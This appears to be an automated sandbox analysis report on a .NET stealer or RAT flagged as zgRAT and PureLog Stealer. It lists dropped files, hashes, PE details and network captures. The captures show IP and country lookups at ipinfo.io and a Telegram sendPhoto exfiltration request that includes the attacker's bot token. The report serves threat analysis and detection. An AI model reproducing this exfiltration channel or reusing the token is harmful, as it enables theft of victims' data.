SSDEEP:	384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
MD5:	8AE2B8FA17C9C4D99F76693A627307D9
SHA1:	7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
SHA-256:	0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
SHA-512:	DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Windows\CbsTemp\27d1bcfc3c54e0

Download File

Process:	C:\Users\user\Desktop\Etqq32Yuw4.exe
File Type:	ASCII text, with very long lines (744), with no line terminators
Category:	dropped
Size (bytes):	744
Entropy (8bit):	5.893315213761689
Encrypted:	false
SSDEEP:	12:V0WPMDLoYXMdbamihkfpbSdPeGNo8ai24WbKuUyivYH/ZsRhQwivpy:V0WPMDjWaMQeGN0pee/GzQhy
MD5:	B0A7973D324F38441BF47C66F4A939E1
SHA1:	E9B25EF779F22429B9D90BA0DB530EF2419E1068
SHA-256:	2F51C249B5DC05B879AC9102AB9C1535F0C3EE319D51BDF70D50BA3C0D7687C4
SHA-512:	A9CF28495940D37D1EC5B36A209F1D4C3EF095EFEAEE60BD1B310620A8A2A1DD19C21AEF531196CBDA8DB7E7CABAC40F40D5C8FD48591CCFD475BA47CEB921BC
Malicious:	false
Preview:	WOQNg27Ntt4Gv7B9tARAm0ewJYVWB1LEcVa6VWtBBXFVggLdA9Fjz5HgteEIhlL2hznZhFoXRP9PuIPnM1WCvlPhN4M0SkeaLNxr2v65VsSj52vlOa5pOJG6kGLm2xEqvjDhUivb5bqDSplVIll2pzLCH1GvjTCinmyWzNQqpduxcCn5f0eQLMB5YAadb92mYIaq0Og4U5MLFXjENKQszwXal37yxxOqkIZUl7EQTj5P9z0BbVPQsJwlv9E7RsHhqgk77PcQF9YP0HbwC6Wbh77aVyim2H9lcXjcO3DL29KsuhuoiS5UVpAsjJmJq0X8Axxch8hI2LjhwOpxD4EjMoPwX02ER4eCmMs7tRGjuwcKGd5VeyFwwxvWhAFrFd17qg5kgsDvxfzaLFq34hkczsQyaVZtMZdR4fejiVzvuU8Q8VKcULwi3YI7QGJKSUjYBhfqkHVjsyset90EK6ZAm4YgWhSbLocavjOb0e2N0N0EqnNRQEAW4iwHJ8TDy3XDWRtKuZOqEMKYET0tTBLHoGfMxHR2KyY60wsY4Dg00TRsYXCzIktwrPZPwgWmHVgPxOiSlbzQfUQUywyZFcujFmOkXcmXq3texC5KzuNqvdRX9Ea9s6hol6KK974Izbjllvhw1okUOEylV1lSCnptWE311uK2zF0T4pvNgnHDWNahIjzIWlGLwzPg2q5HdsfJNerpFXwYflXIoVtS4CgN9phEaPV0sAjosRUn1JC8

C:\Windows\CbsTemp\System.exe

Download File

Process:	C:\Users\user\Desktop\Etqq32Yuw4.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1995264
Entropy (8bit):	7.563817177395898
Encrypted:	false
SSDEEP:	24576:3D3bq5QJoEoChSWB2yfXv3zXK8oH3y2e4OWURyGELRgROkTljwoLe/Jd0H1kI1n2:TTyyfXPzXKBy2GyGw4O0lmJIJ
MD5:	0F52130D0A1ABBE40D9F582B1F95A3E3
SHA1:	BEB72E7DCCFBFE80868AB9BA16B866A26D5B75D9
SHA-256:	C0ECC22A4CC8EF912B7D1DE3DD48C9DC32CA053535AA71DA572AEB6F9C91D4AE
SHA-512:	290A2F7FEEB312016DE0DBA0BFAA85328D0BD643D9683655650C7807A0E0D2527584821B00D89AF5F5B55A77492939A2168A541F11E5807A12965EBDC1440A0E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\CbsTemp\System.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\CbsTemp\System.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\CbsTemp\System.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\CbsTemp\System.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\CbsTemp\System.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\CbsTemp\System.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....pg.................j.............. ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text....i... ...j.................. ..`.rsrc... ............l..............@....reloc...............p..............@..B........................H.......8..............................................................0..........(.... ........8........E............9.......8....(.... ....8....(.... ....~....{i...9....& ....8....(.... ....~....{....9....& ....8........0.......... ........8........E....1...........g...{.......8,.......~....(B...~....(F... ....<.... ....8....~....(:... .... .... ....s....~....(>....... ....8\|...~....:^... ....8h...8O... ....~....{....:O...& ....8D......... ....~....{....:...& ....8....r

C:\Windows\CbsTemp\System.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Etqq32Yuw4.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.838116074234192
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FXAN9wTfONvoTMyNvj:Vx993DEUtN9wTWS4U
MD5:	B4B9262B93CB86B09001AD3D0C2E08ED
SHA1:	176C7A91A52ED35685B87E7E7477900D269F8C35
SHA-256:	67AE155EB6EA4C394050F931A3B1AAA79F1C199BDA22400EEE99FD47F020C09F
SHA-512:	7A3574B50FF557E81F9CA7F242116D249DFE099F8C2733A725BE2DF9E2BAA8818A73D6DFE4227F74F306F9CF76D2C79E2A91E833F7E141E3D538B96073D3DC4C
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 31/12/2024 16:29:00..16:29:00, error: 0x80072746.16:29:05, error: 0x80072746.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.563817177395898
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Etqq32Yuw4.exe
File size:	1'995'264 bytes
MD5:	0f52130d0a1abbe40d9f582b1f95a3e3
SHA1:	beb72e7dccfbfe80868ab9ba16b866a26d5b75d9
SHA256:	c0ecc22a4cc8ef912b7d1de3dd48c9dc32ca053535aa71da572aeb6f9c91d4ae
SHA512:	290a2f7feeb312016de0dba0bfaa85328d0bd643d9683655650c7807a0e0d2527584821b00d89af5f5b55a77492939a2168a541f11e5807a12965ebdc1440a0e
SSDEEP:	24576:3D3bq5QJoEoChSWB2yfXv3zXK8oH3y2e4OWURyGELRgROkTljwoLe/Jd0H1kI1n2:TTyyfXPzXKBy2GyGw4O0lmJIJ
TLSH:	3295BF0665D18E73C2A157365567423D8290DB6636A1EF0B3A5F20E2AD07FF18F722B3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....pg.................j............... ........@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x5e89ce
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6770DFCB [Sun Dec 29 05:36:11 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1e8980	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1ea000	0x320	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1ec000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1e69d4	0x1e6a00	d31e395636ecea4c7f0e601e57748818	False	0.7872709229707167	data	7.56712127893692	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x1ea000	0x320	0x400	718a4114cbf5b42966612d186812a8a8	False	0.3544921875	data	2.6537284131589467	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x1ec000	0xc	0x200	c754d8db437a9b7b9e514bcad342f412	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x1ea058	0x2c8	data			0.46207865168539325

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-31T21:06:12.119572+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49731	34.117.59.81	443	TCP
2024-12-31T21:06:13.556180+0100	1810009	Joe Security ANOMALY Telegram Send Photo	1	192.168.2.4	49732	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 21:06:10.818295002 CET	49730	443	192.168.2.4	34.117.59.81
Dec 31, 2024 21:06:10.818403959 CET	443	49730	34.117.59.81	192.168.2.4
Dec 31, 2024 21:06:10.818850040 CET	49730	443	192.168.2.4	34.117.59.81
Dec 31, 2024 21:06:10.832045078 CET	49730	443	192.168.2.4	34.117.59.81
Dec 31, 2024 21:06:10.832083941 CET	443	49730	34.117.59.81	192.168.2.4
Dec 31, 2024 21:06:11.330502033 CET	443	49730	34.117.59.81	192.168.2.4
Dec 31, 2024 21:06:11.330570936 CET	49730	443	192.168.2.4	34.117.59.81
Dec 31, 2024 21:06:11.333204031 CET	49730	443	192.168.2.4	34.117.59.81
Dec 31, 2024 21:06:11.333218098 CET	443	49730	34.117.59.81	192.168.2.4
Dec 31, 2024 21:06:11.333426952 CET	443	49730	34.117.59.81	192.168.2.4
Dec 31, 2024 21:06:11.375518084 CET	49730	443	192.168.2.4	34.117.59.81
Dec 31, 2024 21:06:11.419361115 CET	443	49730	34.117.59.81	192.168.2.4
Dec 31, 2024 21:06:11.504199982 CET	443	49730	34.117.59.81	192.168.2.4
Dec 31, 2024 21:06:11.504257917 CET	443	49730	34.117.59.81	192.168.2.4
Dec 31, 2024 21:06:11.504525900 CET	49730	443	192.168.2.4	34.117.59.81
Dec 31, 2024 21:06:11.508847952 CET	49730	443	192.168.2.4	34.117.59.81
Dec 31, 2024 21:06:11.511257887 CET	49731	443	192.168.2.4	34.117.59.81
Dec 31, 2024 21:06:11.511293888 CET	443	49731	34.117.59.81	192.168.2.4
Dec 31, 2024 21:06:11.511389971 CET	49731	443	192.168.2.4	34.117.59.81
Dec 31, 2024 21:06:11.511619091 CET	49731	443	192.168.2.4	34.117.59.81
Dec 31, 2024 21:06:11.511634111 CET	443	49731	34.117.59.81	192.168.2.4
Dec 31, 2024 21:06:11.974252939 CET	443	49731	34.117.59.81	192.168.2.4
Dec 31, 2024 21:06:11.992727041 CET	49731	443	192.168.2.4	34.117.59.81
Dec 31, 2024 21:06:11.992741108 CET	443	49731	34.117.59.81	192.168.2.4
Dec 31, 2024 21:06:12.119580984 CET	443	49731	34.117.59.81	192.168.2.4
Dec 31, 2024 21:06:12.119785070 CET	443	49731	34.117.59.81	192.168.2.4
Dec 31, 2024 21:06:12.119848967 CET	49731	443	192.168.2.4	34.117.59.81
Dec 31, 2024 21:06:12.126705885 CET	49731	443	192.168.2.4	34.117.59.81
Dec 31, 2024 21:06:12.474875927 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:12.474956989 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:12.475213051 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:12.476900101 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:12.476934910 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.150700092 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.150790930 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.153944016 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.153970003 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.154189110 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.155412912 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.203331947 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.556088924 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.556137085 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.558990955 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.559004068 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.559099913 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.559109926 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.559233904 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.559243917 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.559581041 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.559590101 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.560200930 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.562854052 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.564034939 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.564069986 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.564292908 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.564307928 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.568532944 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.568546057 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.568631887 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.568645954 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.568711996 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.568725109 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.568840027 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.568851948 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.568978071 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.568989992 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.569108009 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.569120884 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.569185972 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.569195986 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.569478035 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.569490910 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.569551945 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.569569111 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.569622993 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.569622993 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.569659948 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.569694996 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.569700956 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.569725037 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.569813013 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.569825888 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.569902897 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.569916010 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.570408106 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.570436001 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.570522070 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.570533991 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.570656061 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.570668936 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.570709944 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.570727110 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.570750952 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.570761919 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.570878029 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.611347914 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:13.611424923 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:13.611454010 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:14.704451084 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:14.704611063 CET	443	49732	149.154.167.220	192.168.2.4
Dec 31, 2024 21:06:14.704648972 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:14.704761028 CET	49732	443	192.168.2.4	149.154.167.220
Dec 31, 2024 21:06:14.710949898 CET	49732	443	192.168.2.4	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 21:06:10.805123091 CET	61421	53	192.168.2.4	1.1.1.1
Dec 31, 2024 21:06:10.811966896 CET	53	61421	1.1.1.1	192.168.2.4
Dec 31, 2024 21:06:12.464191914 CET	62306	53	192.168.2.4	1.1.1.1
Dec 31, 2024 21:06:12.471467018 CET	53	62306	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 31, 2024 21:06:10.805123091 CET	192.168.2.4	1.1.1.1	0x52fb	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
Dec 31, 2024 21:06:12.464191914 CET	192.168.2.4	1.1.1.1	0x2c3b	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 31, 2024 21:06:10.811966896 CET	1.1.1.1	192.168.2.4	0x52fb	No error (0)	ipinfo.io		34.117.59.81	A (IP address)	IN (0x0001)	false
Dec 31, 2024 21:06:12.471467018 CET	1.1.1.1	192.168.2.4	0x2c3b	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ipinfo.io

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	34.117.59.81	443	7500	C:\Users\user\Desktop\Etqq32Yuw4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 20:06:11 UTC	61	OUT	GET /ip HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
2024-12-31 20:06:11 UTC	305	IN	HTTP/1.1 200 OK date: Tue, 31 Dec 2024 20:06:10 GMT content-type: text/plain; charset=utf-8 Content-Length: 12 access-control-allow-origin: * via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-31 20:06:11 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	34.117.59.81	443	7500	C:\Users\user\Desktop\Etqq32Yuw4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 20:06:11 UTC	42	OUT	GET /country HTTP/1.1 Host: ipinfo.io
2024-12-31 20:06:12 UTC	448	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 3 content-type: text/html; charset=utf-8 date: Tue, 31 Dec 2024 20:06:12 GMT referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-31 20:06:12 UTC	3	IN	Data Raw: 55 53 0a Data Ascii: US

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	149.154.167.220	443	7500	C:\Users\user\Desktop\Etqq32Yuw4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 20:06:13 UTC	255	OUT	POST /bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhoto HTTP/1.1 Content-Type: multipart/form-data; boundary="0d1016a9-b6d2-4447-b2c3-ce9150ecfb94" Host: api.telegram.org Content-Length: 87332 Expect: 100-continue Connection: Keep-Alive
2024-12-31 20:06:13 UTC	40	OUT	Data Raw: 2d 2d 30 64 31 30 31 36 61 39 2d 62 36 64 32 2d 34 34 34 37 2d 62 32 63 33 2d 63 65 39 31 35 30 65 63 66 62 39 34 0d 0a Data Ascii: --0d1016a9-b6d2-4447-b2c3-ce9150ecfb94
2024-12-31 20:06:13 UTC	89	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-12-31 20:06:13 UTC	10	OUT	Data Raw: 36 32 38 33 33 37 33 34 34 32 Data Ascii: 6283373442
2024-12-31 20:06:13 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 30 64 31 30 31 36 61 39 2d 62 36 64 32 2d 34 34 34 37 2d 62 32 63 33 2d 63 65 39 31 35 30 65 63 66 62 39 34 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 61 70 74 69 6f 6e 0d 0a 0d 0a Data Ascii: --0d1016a9-b6d2-4447-b2c3-ce9150ecfb94Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=caption
